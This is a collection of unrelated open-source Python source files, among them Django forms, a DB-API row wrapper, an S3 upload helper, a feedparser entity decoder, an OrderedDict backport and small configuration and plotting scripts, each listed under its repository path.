dbh.execute("insert into mac select inode_id,status,time,sum(m) as `m`,sum(a) as `a`,sum(c) as `c`,sum(d) as `d`,name from %s where time>0 group by time,name order by time,name" % temp_table)
dbh.check_index("mac","inode_id")
def progress(self, query, result):
result.heading("Building Timeline")
def display(self, query, result):
dbh = self.DBO(query['case'])
result.heading("File Timeline for Filesystem")
result.table(
elements=[ TimestampType('Timestamp','time'),
AFF4URN(case=query['case']),
DeletedType(),
BinaryType('m',"m"),
BinaryType('a',"a"),
BinaryType('c',"c"),
BinaryType('d',"d"),
FilenameType(),
],
table='mac',
case=query['case'],
)
def reset(self, query):
dbh = self.DBO(query['case'])
dbh.execute("drop table mac")
|
mmccoo/kicad_mmccoo
|
refs/heads/master
|
svg2border/test_parser.py
|
1
|
import inspect
import sys, os.path
oldpath = sys.path
# inspect.stack()[0][1] is the full path to the current file.
sys.path.insert(0, os.path.dirname(inspect.stack()[0][1]))
import parse_svg_path
sys.path = oldpath
paths = parse_svg_path.parse_svg_path('/home/mmccoo/kicad/kicad_mmccoo/svg2border/drawing.svg')
for path in paths:
print("path {}".format(parse_svg_path.path_bbox(path)))
#for poly in path.polys:
#print(" points {}".format(poly))
#print(" is hole {}".format(parse_svg_path.poly_is_hole(poly)))
# print(" points 18{}".format(poly))
for shape in path.group_by_bound_and_holes():
print("bounds: {}".format(shape.bound))
print("with holes:")
for hole in shape.holes:
print(" hole: {}".format(hole))
|
sreichholf/python-coherence
|
refs/heads/develop
|
coherence/extern/db_row.py
|
2
|
# Wraps DB-API 2.0 query results to provide a nice list and dictionary interface.
# Copyright (C) 2002 Dr. Conan C. Albrecht <conan_albrecht@byu.edu>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# I created this class and related functions because I like accessing
# database results by field name rather than field number. Accessing
# by field number has many problems: code is less readable, code gets
# broken when field positions change or fields are added or deleted from
# the query, etc.
#
# This class should have little overhead if you are already using fetchall().
# It wraps each result row in a ResultRow class which allows you to
# retrieve results via a dictionary interface (by column name). The regular
# list interface (by column number) is also provided.
#
# I can't believe the DB-API 2.0 api didn't include dictionary-style results.
# I'd love to see the reasoning behind not requiring them of database connection
# classes.
# This module comes from:
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/163605
def get_rows(cursor, sql):
"""Return a list of ResultRow objects from an SQL query."""
# run the query
cursor.execute(sql)
# return the list
return getdict(cursor.fetchall(), cursor.description)
def getdict(results, description):
"""Return the list of DBRows in `results` with a given description."""
# get the field names
fields = {}
for i in range(len(description)):
fields[description[i][0]] = i
# generate the list of DBRow objects
rows = []
for result in results:
rows.append(DBRow(result, fields))
# return to the user
return rows
class DBRow(object):
"""A single row in a result set.
Each DBRow has a dictionary-style and list-style interface.
"""
def __init__(self, row, fields):
"""Called by ResultSet function. Don't call directly"""
self.fields = fields
self.row = row
self._extra_fields = {}
def __repr__(self):
return "<DBrow with %s fields>" % len(self)
def __str__(self):
"""Return a string representation"""
return str(self.row)
def __getattr__(self, attr):
return self.row[self.fields[attr]]
def set_extra_attr(self, attr, value):
self._extra_fields[attr] = value
def __getitem__(self, key):
"""Return the value of the named column"""
if type(key) == type(1): # if a number
return self.row[key]
else: # a field name
return self.row[self.fields[key]]
def __setitem__(self, key, value):
"""Not used in this implementation"""
raise TypeError("can't set an item of a result set")
def __getslice__(self, i, j):
"""Return the value of the numbered column"""
return self.row[i: j]
def __setslice__(self, i, j, list):
"""Not used in this implementation"""
raise TypeError("can't set an item of a result set")
def keys(self):
"""Return the field names"""
return self.fields.keys()
def keymappings(self):
"""Return a dictionary of the keys and their indices in the row"""
return self.fields
def has_key(self, key):
"""Return whether the given key is valid"""
return self.fields.has_key(key)
def as_dict(self):
d = {}
for field_name, pos in self.fields.iteritems():
d[field_name] = self.row[pos]
for field_name, field in self._extra_fields.iteritems():
d[field_name] = field
return d
def __len__(self):
"""Return how many columns are in this row"""
return len(self.row)
def __nonzero__(self):
return len(self.row) != 0
def __eq__(self, other):
        ## comparison against None is always unequal
        if other is None:
            return False
return self.fields == other.fields
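# Usage sketch (assumes a DB-API 2.0 cursor; the table and column names are
# hypothetical):
#
#   rows = get_rows(cursor, "SELECT id, name FROM users")
#   for row in rows:
#       print row.name     # attribute access by column name
#       print row['name']  # dictionary-style access
#       print row[0]       # positional access still works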
|
rob-hills/Booktype
|
refs/heads/2.0
|
lib/booktype/apps/reader/forms.py
|
2
|
from django import forms
from booki.editor.models import Book
from django.utils.translation import ugettext_lazy as _
from booktype.apps.core.forms import BaseBooktypeForm
class EditBookInfoForm(BaseBooktypeForm, forms.ModelForm):
description = forms.CharField(
label=_("Book description"),
required=False,
widget=forms.Textarea(attrs={'style': "width: 100%; height: 210px;"})
)
book_cover = forms.ImageField(
label=_("Book image"),
required=False
)
hidden = forms.BooleanField(
label=_('Initially hide from others'),
required=False
)
class Meta:
model = Book
exclude = [
'url_title', 'title',
'status', 'language',
'version', 'group',
'created', 'published',
'permission', 'cover'
]
fields = [
'description', 'book_cover',
'owner', 'license', 'hidden'
]
def __init__(self, user, *args, **kwargs):
super(EditBookInfoForm, self).__init__(*args, **kwargs)
if not user.is_superuser:
del self.fields['owner']
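# Usage sketch (hypothetical view code; `request` and `book` are assumptions):
#
#   form = EditBookInfoForm(request.user, request.POST, instance=book)
#   if form.is_valid():     # non-superusers never see the 'owner' field
#       form.save()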
|
mredar/django-dublincore
|
refs/heads/master
|
test_project/test_project/wsgi.py
|
73
|
"""
WSGI config for test_project project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "test_project.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
|
qpython-android/QPypi-numpy
|
refs/heads/master
|
numpy/distutils/command/bdist_rpm.py
|
101
|
import os
import sys
if 'setuptools' in sys.modules:
from setuptools.command.bdist_rpm import bdist_rpm as old_bdist_rpm
else:
from distutils.command.bdist_rpm import bdist_rpm as old_bdist_rpm
class bdist_rpm(old_bdist_rpm):
def _make_spec_file(self):
spec_file = old_bdist_rpm._make_spec_file(self)
# Replace hardcoded setup.py script name
# with the real setup script name.
setup_py = os.path.basename(sys.argv[0])
if setup_py == 'setup.py':
return spec_file
new_spec_file = []
for line in spec_file:
line = line.replace('setup.py',setup_py)
new_spec_file.append(line)
return new_spec_file
|
cactusbin/nyt
|
refs/heads/master
|
matplotlib/doc/pyplots/whats_new_98_4_fancy.py
|
6
|
import matplotlib.patches as mpatch
import matplotlib.pyplot as plt
figheight = 8
fig = plt.figure(1, figsize=(9, figheight), dpi=80)
fontsize = 0.4 * fig.dpi
def make_boxstyles(ax):
styles = mpatch.BoxStyle.get_styles()
for i, (stylename, styleclass) in enumerate(styles.items()):
ax.text(0.5, (float(len(styles)) - 0.5 - i)/len(styles), stylename,
ha="center",
size=fontsize,
transform=ax.transAxes,
bbox=dict(boxstyle=stylename, fc="w", ec="k"))
def make_arrowstyles(ax):
styles = mpatch.ArrowStyle.get_styles()
ax.set_xlim(0, 4)
ax.set_ylim(0, figheight)
for i, (stylename, styleclass) in enumerate(sorted(styles.items())):
y = (float(len(styles)) -0.25 - i) # /figheight
p = mpatch.Circle((3.2, y), 0.2, fc="w")
ax.add_patch(p)
ax.annotate(stylename, (3.2, y),
(2., y),
#xycoords="figure fraction", textcoords="figure fraction",
ha="right", va="center",
size=fontsize,
arrowprops=dict(arrowstyle=stylename,
patchB=p,
shrinkA=5,
shrinkB=5,
fc="w", ec="k",
connectionstyle="arc3,rad=-0.05",
),
bbox=dict(boxstyle="square", fc="w"))
ax.xaxis.set_visible(False)
ax.yaxis.set_visible(False)
ax1 = fig.add_subplot(121, frameon=False, xticks=[], yticks=[])
make_boxstyles(ax1)
ax2 = fig.add_subplot(122, frameon=False, xticks=[], yticks=[])
make_arrowstyles(ax2)
plt.show()
|
yetercatikkas/ulakbus
|
refs/heads/master
|
ulakbus/lib/s3_file_manager.py
|
1
|
# -*- coding: utf-8 -*-
"""
"""
# Copyright (C) 2015 ZetaOps Inc.
#
# This file is licensed under the GNU General Public License v3
# (GPLv3). See LICENSE.txt for details.
import base64
import os
from uuid import uuid4
from boto.s3.connection import S3Connection as s3
from boto.s3.key import Key
from pyoko.conf import settings
class S3FileManager(object):
def __init__(self):
self.conn = s3(aws_access_key_id=settings.S3_ACCESS_KEY,
aws_secret_access_key=settings.S3_SECRET_KEY,
proxy=settings.S3_PROXY_URL,
proxy_port=settings.S3_PROXY_PORT,
is_secure=False)
def store_file(self, **kwargs):
bucket = self.conn.get_bucket(settings.S3_BUCKET_NAME)
content = kwargs['content']
k = Key(bucket)
filename = None
if 'name' in kwargs:
filename, extension = os.path.splitext(kwargs['name'])
extension = extension.replace('.', '')
if 'ext' in kwargs:
extension = kwargs['ext']
typ, ext = settings.ALLOWED_FILE_TYPES[extension]
if "type" in kwargs:
typ = kwargs['type']
if 'random_name' in kwargs:
filename = None
k.key = "%s.%s" % (filename or uuid4().hex, ext)
k.content_type = typ
content = base64.decodestring(content.split('base64,')[1])
k.set_contents_from_string(content)
bucket.set_acl('public-read', k.key)
return k.key
@staticmethod
def get_url(key):
return "%s%s" % (settings.S3_PUBLIC_URL, key)
|
UManPychron/pychron
|
refs/heads/develop
|
docs/user_guide/operation/scripts/examples/helix/measurement/felix_analysis120_60_no_center.py
|
2
|
#!Measurement
'''
baseline:
after: true
before: false
counts: 60
detector: H2
mass: 40.062
settling_time: 15.0
default_fits: nominal
equilibration:
eqtime: 1.0
inlet: H
inlet_delay: 3
outlet: V
use_extraction_eqtime: true
multicollect:
counts: 120
detector: H2
isotope: Ar40
peakcenter:
after: false
before: false
detector: H2
detectors:
- H1
- L2(CDD)
isotope: Ar40
integration_time: 1.048576
peakhop:
hops_name: ''
use_peak_hop: false
'''
ACTIVE_DETECTORS=('H2','H1','AX','L1','L2(CDD)')
def main():
info('unknown measurement script')
activate_detectors(*ACTIVE_DETECTORS)
if mx.peakcenter.before:
peak_center(detector=mx.peakcenter.detector,isotope=mx.peakcenter.isotope)
if mx.baseline.before:
baselines(ncounts=mx.baseline.counts,mass=mx.baseline.mass, detector=mx.baseline.detector,
settling_time=mx.baseline.settling_time)
position_magnet(mx.multicollect.isotope, detector=mx.multicollect.detector)
#sniff the gas during equilibration
if mx.equilibration.use_extraction_eqtime:
eqt = eqtime
else:
eqt = mx.equilibration.eqtime
'''
Equilibrate is non-blocking so use a sniff or sleep as a placeholder
e.g sniff(<equilibration_time>) or sleep(<equilibration_time>)
'''
equilibrate(eqtime=eqt, inlet=mx.equilibration.inlet, outlet=mx.equilibration.outlet,
delay=mx.equilibration.inlet_delay)
set_time_zero()
sniff(eqt)
set_fits()
set_baseline_fits()
#multicollect on active detectors
multicollect(ncounts=mx.multicollect.counts, integration_time=1.048576)
if mx.baseline.after:
baselines(ncounts=mx.baseline.counts,mass=mx.baseline.mass, detector=mx.baseline.detector,
settling_time=mx.baseline.settling_time)
if mx.peakcenter.after:
activate_detectors(*mx.peakcenter.detectors, **{'peak_center':True})
peak_center(detector=mx.peakcenter.detector,isotope=mx.peakcenter.isotope,
integration_time=mx.peakcenter.integration_time)
if use_cdd_warming:
gosub('warm_cdd', argv=(mx.equilibration.outlet,))
info('finished measure script')
|
XDATA-Year-3/clique-anb
|
refs/heads/master
|
src/assets/tangelo/anb/get_nodes.py
|
1
|
from pymongo import MongoClient
def run(host=None, db=None, coll=None, filename=None):
client = MongoClient(host)
db = client[db]
graph = db[coll]
return graph.distinct("data.label", {"type": "node",
"data.filename": filename})
|
adieu/django-nonrel
|
refs/heads/master
|
django/contrib/gis/gdal/error.py
|
466
|
"""
This module houses the OGR & SRS Exception objects, and the
check_err() routine which checks the status code returned by
OGR methods.
"""
#### OGR & SRS Exceptions ####
class GDALException(Exception): pass
class OGRException(Exception): pass
class SRSException(Exception): pass
class OGRIndexError(OGRException, KeyError):
"""
This exception is raised when an invalid index is encountered, and has
    the 'silent_variable_failure' attribute set to true. This ensures that
django's templates proceed to use the next lookup type gracefully when
an Exception is raised. Fixes ticket #4740.
"""
silent_variable_failure = True
#### OGR error checking codes and routine ####
# OGR Error Codes
OGRERR_DICT = { 1 : (OGRException, 'Not enough data.'),
2 : (OGRException, 'Not enough memory.'),
3 : (OGRException, 'Unsupported geometry type.'),
4 : (OGRException, 'Unsupported operation.'),
5 : (OGRException, 'Corrupt data.'),
6 : (OGRException, 'OGR failure.'),
7 : (SRSException, 'Unsupported SRS.'),
8 : (OGRException, 'Invalid handle.'),
}
OGRERR_NONE = 0
def check_err(code):
"Checks the given OGRERR, and raises an exception where appropriate."
if code == OGRERR_NONE:
return
elif code in OGRERR_DICT:
e, msg = OGRERR_DICT[code]
raise e(msg)
else:
raise OGRException('Unknown error code: "%s"' % code)
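# Usage sketch, driven entirely by the table above:
#
#   check_err(OGRERR_NONE)  # returns silently
#   check_err(7)            # raises SRSException('Unsupported SRS.')
#   check_err(99)           # raises OGRException('Unknown error code: "99"')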
|
FluffyMortain/heekscnc
|
refs/heads/master
|
pycnc/Operation.py
|
24
|
from Object import Object
from consts import *
import HeeksCNC
from CNCConfig import CNCConfig
class Operation(Object):
def __init__(self):
Object.__init__(self)
self.active = True
self.comment = ''
self.title = self.TypeName()
self.tool_number = 0
def TypeName(self):
return "Operation"
def icon(self):
# the name of the PNG file in the HeeksCNC icons folder
if self.active:
return self.op_icon()
else:
return "noentry"
def CanBeDeleted(self):
return True
def UsesTool(self): # some operations don't use the tool number
return True
def ReadDefaultValues(self):
config = CNCConfig()
self.tool_number = config.ReadInt("OpTool", 0)
if self.tool_number != 0:
default_tool = HeeksCNC.program.tools.FindTool(self.tool_number)
            if default_tool is None:
self.tool_number = 0
else:
self.tool_number = default_tool.tool_number
if self.tool_number == 0:
first_tool = HeeksCNC.program.tools.FindFirstTool(TOOL_TYPE_SLOTCUTTER)
if first_tool:
self.tool_number = first_tool.tool_number
else:
first_tool = HeeksCNC.program.tools.FindFirstTool(TOOL_TYPE_ENDMILL)
if first_tool:
self.tool_number = first_tool.tool_number
else:
first_tool = HeeksCNC.program.tools.FindFirstTool(TOOL_TYPE_BALLENDMILL)
if first_tool:
self.tool_number = first_tool.tool_number
def WriteDefaultValues(self):
config = CNCConfig()
if self.tool_number != 0:
config.WriteInt("OpTool", self.tool_number)
def AppendTextToProgram(self):
if len(self.comment) > 0:
HeeksCNC.program.python_program += "comment(" + self.comment + ")\n"
if self.UsesTool():
HeeksCNC.machine_state.AppendToolChangeText(self.tool_number) # Select the correct tool.
|
Vagab0nd/SiCKRAGE
|
refs/heads/master
|
lib3/feedparser/parsers/loose.py
|
3
|
# The loose feed parser that interfaces with an SGML parsing library
# Copyright 2010-2020 Kurt McKee <contactme@kurtmckee.org>
# Copyright 2002-2008 Mark Pilgrim
# All rights reserved.
#
# This file is a part of feedparser.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS'
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import absolute_import
from __future__ import unicode_literals
class _LooseFeedParser(object):
contentparams = None
def __init__(self, baseuri=None, baselang=None, encoding=None, entities=None):
self.baseuri = baseuri or ''
self.lang = baselang or None
self.encoding = encoding or 'utf-8' # character encoding
self.entities = entities or {}
super(_LooseFeedParser, self).__init__()
@staticmethod
def _normalize_attributes(kv):
k = kv[0].lower()
v = k in ('rel', 'type') and kv[1].lower() or kv[1]
# the sgml parser doesn't handle entities in attributes, nor
# does it pass the attribute values through as unicode, while
# strict xml parsers do -- account for this difference
        v = v.replace('&amp;', '&')
return k, v
def decode_entities(self, element, data):
        data = data.replace('&#60;', '&lt;')
        data = data.replace('&#x3c;', '&lt;')
        data = data.replace('&#x3C;', '&lt;')
        data = data.replace('&#62;', '&gt;')
        data = data.replace('&#x3e;', '&gt;')
        data = data.replace('&#x3E;', '&gt;')
        data = data.replace('&#38;', '&amp;')
        data = data.replace('&#x26;', '&amp;')
        data = data.replace('&#34;', '&quot;')
        data = data.replace('&#x22;', '&quot;')
        data = data.replace('&#39;', '&apos;')
        data = data.replace('&#x27;', '&apos;')
        if not self.contentparams.get('type', 'xml').endswith('xml'):
            data = data.replace('&lt;', '<')
            data = data.replace('&gt;', '>')
            data = data.replace('&amp;', '&')
            data = data.replace('&quot;', '"')
            data = data.replace('&apos;', "'")
            data = data.replace('&#x2f;', '/')
            data = data.replace('&#x2F;', '/')
return data
@staticmethod
def strattrs(attrs):
return ''.join(
' %s="%s"' % (n, v.replace('"', '"'))
for n, v in attrs
)
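# Usage sketch (the class is normally mixed into an SGML parser, so this only
# exercises the pure entity logic):
#
#   parser = _LooseFeedParser()
#   parser.contentparams = {'type': 'text/html'}
#   parser.decode_entities('p', '&#60;b&#62;')  # -> '<b>' for non-XML content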
|
MalloyPower/parsing-python
|
refs/heads/master
|
front-end/testsuite-python-lib/Python-2.7.2/Lib/xml/dom/minicompat.py
|
209
|
"""Python version compatibility support for minidom."""
# This module should only be imported using "import *".
#
# The following names are defined:
#
# NodeList -- lightest possible NodeList implementation
#
# EmptyNodeList -- lightest possible NodeList that is guaranteed to
# remain empty (immutable)
#
# StringTypes -- tuple of defined string types
#
# defproperty -- function used in conjunction with GetattrMagic;
# using these together is needed to make them work
# as efficiently as possible in both Python 2.2+
# and older versions. For example:
#
# class MyClass(GetattrMagic):
# def _get_myattr(self):
# return something
#
# defproperty(MyClass, "myattr",
# "return some value")
#
# For Python 2.2 and newer, this will construct a
# property object on the class, which avoids
# needing to override __getattr__(). It will only
# work for read-only attributes.
#
# For older versions of Python, inheriting from
# GetattrMagic will use the traditional
# __getattr__() hackery to achieve the same effect,
# but less efficiently.
#
# defproperty() should be used for each version of
# the relevant _get_<property>() function.
__all__ = ["NodeList", "EmptyNodeList", "StringTypes", "defproperty"]
import xml.dom
try:
unicode
except NameError:
StringTypes = type(''),
else:
StringTypes = type(''), type(unicode(''))
class NodeList(list):
__slots__ = ()
def item(self, index):
if 0 <= index < len(self):
return self[index]
def _get_length(self):
return len(self)
def _set_length(self, value):
raise xml.dom.NoModificationAllowedErr(
"attempt to modify read-only attribute 'length'")
length = property(_get_length, _set_length,
doc="The number of nodes in the NodeList.")
def __getstate__(self):
return list(self)
def __setstate__(self, state):
self[:] = state
class EmptyNodeList(tuple):
__slots__ = ()
def __add__(self, other):
NL = NodeList()
NL.extend(other)
return NL
def __radd__(self, other):
NL = NodeList()
NL.extend(other)
return NL
def item(self, index):
return None
def _get_length(self):
return 0
def _set_length(self, value):
raise xml.dom.NoModificationAllowedErr(
"attempt to modify read-only attribute 'length'")
length = property(_get_length, _set_length,
doc="The number of nodes in the NodeList.")
def defproperty(klass, name, doc):
get = getattr(klass, ("_get_" + name)).im_func
def set(self, value, name=name):
raise xml.dom.NoModificationAllowedErr(
"attempt to modify read-only attribute " + repr(name))
assert not hasattr(klass, "_set_" + name), \
"expected not to find _set_" + name
prop = property(get, set, doc=doc)
setattr(klass, name, prop)
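# Usage sketch of defproperty(), mirroring the header comment above
# (Python 2 only, since it reaches for im_func):
#
#   class MyClass(object):
#       def _get_myattr(self):
#           return "some value"
#   defproperty(MyClass, "myattr", doc="A read-only attribute.")
#   MyClass().myattr          # -> "some value"
#   MyClass().myattr = None   # raises xml.dom.NoModificationAllowedErr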
|
Kapeli/PopClip-Extensions
|
refs/heads/master
|
source/OneNote/requests/packages/urllib3/packages/ordered_dict.py
|
2039
|
# Backport of OrderedDict() class that runs on Python 2.4, 2.5, 2.6, 2.7 and pypy.
# Passes Python2.7's test suite and incorporates all the latest updates.
# Copyright 2009 Raymond Hettinger, released under the MIT License.
# http://code.activestate.com/recipes/576693/
try:
from thread import get_ident as _get_ident
except ImportError:
from dummy_thread import get_ident as _get_ident
try:
from _abcoll import KeysView, ValuesView, ItemsView
except ImportError:
pass
class OrderedDict(dict):
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as for regular dictionaries.
# The internal self.__map dictionary maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# Each link is stored as a list of length three: [PREV, NEXT, KEY].
def __init__(self, *args, **kwds):
'''Initialize an ordered dictionary. Signature is the same as for
regular dictionaries, but keyword arguments are not recommended
because their insertion order is arbitrary.
'''
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__root = root = [] # sentinel node
root[:] = [root, root, None]
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value, dict_setitem=dict.__setitem__):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link which goes at the end of the linked
# list, and the inherited dictionary is updated with the new key/value pair.
if key not in self:
root = self.__root
last = root[0]
last[1] = root[0] = self.__map[key] = [last, root, key]
dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which is
# then removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link_prev, link_next, key = self.__map.pop(key)
link_prev[1] = link_next
link_next[0] = link_prev
def __iter__(self):
'od.__iter__() <==> iter(od)'
root = self.__root
curr = root[1]
while curr is not root:
yield curr[2]
curr = curr[1]
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
root = self.__root
curr = root[0]
while curr is not root:
yield curr[2]
curr = curr[0]
def clear(self):
'od.clear() -> None. Remove all items from od.'
try:
for node in self.__map.itervalues():
del node[:]
root = self.__root
root[:] = [root, root, None]
self.__map.clear()
except AttributeError:
pass
dict.clear(self)
def popitem(self, last=True):
'''od.popitem() -> (k, v), return and remove a (key, value) pair.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
root = self.__root
if last:
link = root[0]
link_prev = link[0]
link_prev[1] = root
root[0] = link_prev
else:
link = root[1]
link_next = link[1]
root[1] = link_next
link_next[0] = root
key = link[2]
del self.__map[key]
value = dict.pop(self, key)
return key, value
# -- the following methods do not depend on the internal structure --
def keys(self):
'od.keys() -> list of keys in od'
return list(self)
def values(self):
'od.values() -> list of values in od'
return [self[key] for key in self]
def items(self):
'od.items() -> list of (key, value) pairs in od'
return [(key, self[key]) for key in self]
def iterkeys(self):
'od.iterkeys() -> an iterator over the keys in od'
return iter(self)
def itervalues(self):
'od.itervalues -> an iterator over the values in od'
for k in self:
yield self[k]
def iteritems(self):
'od.iteritems -> an iterator over the (key, value) items in od'
for k in self:
yield (k, self[k])
def update(*args, **kwds):
'''od.update(E, **F) -> None. Update od from dict/iterable E and F.
If E is a dict instance, does: for k in E: od[k] = E[k]
If E has a .keys() method, does: for k in E.keys(): od[k] = E[k]
Or if E is an iterable of items, does: for k, v in E: od[k] = v
In either case, this is followed by: for k, v in F.items(): od[k] = v
'''
if len(args) > 2:
raise TypeError('update() takes at most 2 positional '
'arguments (%d given)' % (len(args),))
elif not args:
raise TypeError('update() takes at least 1 argument (0 given)')
self = args[0]
# Make progressively weaker assumptions about "other"
other = ()
if len(args) == 2:
other = args[1]
if isinstance(other, dict):
for key in other:
self[key] = other[key]
elif hasattr(other, 'keys'):
for key in other.keys():
self[key] = other[key]
else:
for key, value in other:
self[key] = value
for key, value in kwds.items():
self[key] = value
__update = update # let subclasses override update without breaking __init__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding value.
If key is not found, d is returned if given, otherwise KeyError is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
def __repr__(self, _repr_running={}):
'od.__repr__() <==> repr(od)'
call_key = id(self), _get_ident()
if call_key in _repr_running:
return '...'
_repr_running[call_key] = 1
try:
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
finally:
del _repr_running[call_key]
def __reduce__(self):
'Return state information for pickling'
items = [[k, self[k]] for k in self]
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S
and values equal to v (which defaults to None).
'''
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return len(self)==len(other) and self.items() == other.items()
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
# -- the following methods are only used in Python 2.7 --
def viewkeys(self):
"od.viewkeys() -> a set-like object providing a view on od's keys"
return KeysView(self)
def viewvalues(self):
"od.viewvalues() -> an object providing a view on od's values"
return ValuesView(self)
def viewitems(self):
"od.viewitems() -> a set-like object providing a view on od's items"
return ItemsView(self)
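# Usage sketch demonstrating the ordering guarantees implemented above:
#
#   od = OrderedDict([('a', 1), ('b', 2)])
#   od['c'] = 3
#   od.keys()               # -> ['a', 'b', 'c'] (insertion order preserved)
#   od.popitem()            # -> ('c', 3), LIFO by default
#   od.popitem(last=False)  # -> ('a', 1), FIFO when last is false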
|
maestro-hybrid-cloud/horizon
|
refs/heads/master
|
openstack_dashboard/enabled/_2010_admin_system_panel_group.py
|
42
|
from django.utils.translation import ugettext_lazy as _
# The slug of the panel group to be added to HORIZON_CONFIG. Required.
PANEL_GROUP = 'admin'
# The display name of the PANEL_GROUP. Required.
PANEL_GROUP_NAME = _('System')
# The slug of the dashboard the PANEL_GROUP associated with. Required.
PANEL_GROUP_DASHBOARD = 'admin'
|
henrytao-me/openerp.positionq
|
refs/heads/master
|
openerp/addons/document/odt2txt.py
|
435
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import sys, zipfile, xml.dom.minidom
import StringIO
class OpenDocumentTextFile :
def __init__ (self, filepath):
zip = zipfile.ZipFile(filepath)
self.content = xml.dom.minidom.parseString(zip.read("content.xml"))
def toString (self):
""" Converts the document to a string. """
buffer = u""
for val in ["text:p", "text:h", "text:list"]:
for paragraph in self.content.getElementsByTagName(val) :
buffer += self.textToString(paragraph) + "\n"
return buffer
def textToString(self, element):
buffer = u""
for node in element.childNodes :
if node.nodeType == xml.dom.Node.TEXT_NODE :
buffer += node.nodeValue
elif node.nodeType == xml.dom.Node.ELEMENT_NODE :
buffer += self.textToString(node)
return buffer
if __name__ == "__main__" :
    s = StringIO.StringIO(file(sys.argv[1]).read())
odt = OpenDocumentTextFile(s)
print odt.toString().encode('ascii','replace')
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
zidootech/xbmc4zidoo
|
